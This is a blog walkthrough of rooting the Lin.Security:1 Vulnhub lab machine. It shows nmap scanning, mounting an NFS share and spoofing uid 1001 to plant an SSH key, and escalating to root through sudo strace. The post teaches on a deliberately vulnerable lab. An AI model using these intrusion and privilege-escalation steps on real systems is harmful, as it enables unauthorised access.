Lin.Security: 1 Vulnhub Machine Walkthrough

Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.

Lets start by finding the IP.

[email protected]:~# nmap -sS 192.168.18.0/24

Got the IP and open ports.

NFS is running on port 2019. Lets enumerate it.

[email protected]:~# nmap -sV --script=nfs-* 192.168.18.102

We can mount /home/peter to our machine.

[email protected]:/mnt# mkdir lin
[email protected]:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
[email protected]:/mnt# ls -la

In order to login to the machine, we can place our ssh public key in .ssh directory

(refer this article to learn how to create an ssh key)

Copy our public key (id_rsa.pub) to /tmp directory.

[email protected]:/mnt# cd /root/.ssh
[email protected]:~/.ssh# ls -la
total 20
drw-------  2 root root 4096 Jul  2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw-------  1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r--  1 root root  563 Aug 12 08:35 id_rsa.pub
-rw-r--r--  1 root root 3322 Aug 13 06:47 known_hosts
[email protected]:~/.ssh# cp id_rsa.pub /tmp

make a directory named .ssh in the directory we just mounted.

[email protected]:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied

We dont have the permission to create the directory.

Lets create a user with uid 1001 to do this.

[email protected]:~# useradd -u 1001 peter

Now change the ownwership of /tmp/id_rsa.pub to peter

[email protected]:~/.ssh# cd /tmp
[email protected]:/tmp# chown peter:peter id_rsa.pub
[email protected]:/tmp# 

Lets copy the file to the mounted directory now. First lets change the user to peter and copy the file.

[email protected]:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys

We have copied our public key file to /tmp/.ssh/authorized_keys

Now, Let’s try to login as peter through ssh.

[email protected]:~# cd .ssh
[email protected]:~/.ssh# ssh [email protected]

We are now logged in as peter. Lets see what all we can do here as a privileged user.

[email protected]:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

We can run /usr/bin/strace as root.

Can we escalate our privileges with this?

GTFOBins says yes!

Lets try.

[email protected]:~$ sudo strace -o /dev/null /bin/sh
# whoami
root

We got the root!

This was a comparitively easier machine. Lets root another machine next day!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-] melbin.in

Leave a Reply

Your email address will not be published. Required fields are marked *